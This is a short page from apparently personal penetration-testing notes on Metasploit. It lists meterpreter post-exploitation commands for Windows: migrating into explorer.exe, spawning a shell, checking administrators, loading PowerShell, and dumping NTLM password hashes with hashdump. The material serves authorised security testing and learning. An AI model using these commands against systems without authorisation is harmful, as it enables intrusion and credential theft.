✨
Tech Stuff
  • Welcome
  • Threat Hunting
    • Learning ETW
      • Logman
      • SilkETW
      • Apply ETW to Windows Event (1)
    • Learning win32evtlog in python
  • Attack Simulation
    • Atomic Red Team
  • Tools
    • Windows Events Providers Explorer
    • FRIDA for iOS app penetration testing
  • Windows Security
    • User Account Control (UAC)
      • UAC Bypass
  • Windows OS Penetration Testing
    • Metasploit
    • PowerShell
    • Bloodhound
  • Unorganized Python
  • Python - pexpect
  • Python - subprocess for Windows
  • Parsing evtx to json
  • Python - Pykd
  • Workflow
    • Kali Linux on Docker
Powered by GitBook
On this page
  • Post Exploitation Workflow
  • Check group members
  • Load Powershell Extension
  • Dump windows users NTLM hashes

Was this helpful?

  1. Windows OS Penetration Testing

Metasploit

Post Exploitation Workflow

getuid
sysinfo
ps -S explorer.exe #Get the process list with filter "explorer.exe"
migrate <pid> #Migrate the session to process
shell #Spawn a cmd.exe process

Check group members

net localgroup adminstrators

Load Powershell Extension

Spawn a powershell.exe in your meterpreter session, just like running shell command to spawn cmd.exe in your session

meterpreter> load powershell
meterpreter> powershell_shell

Dump windows users NTLM hashes

meterpreter> hashdump

PreviousUAC BypassNextPowerShell

Last updated 4 years ago

Was this helpful?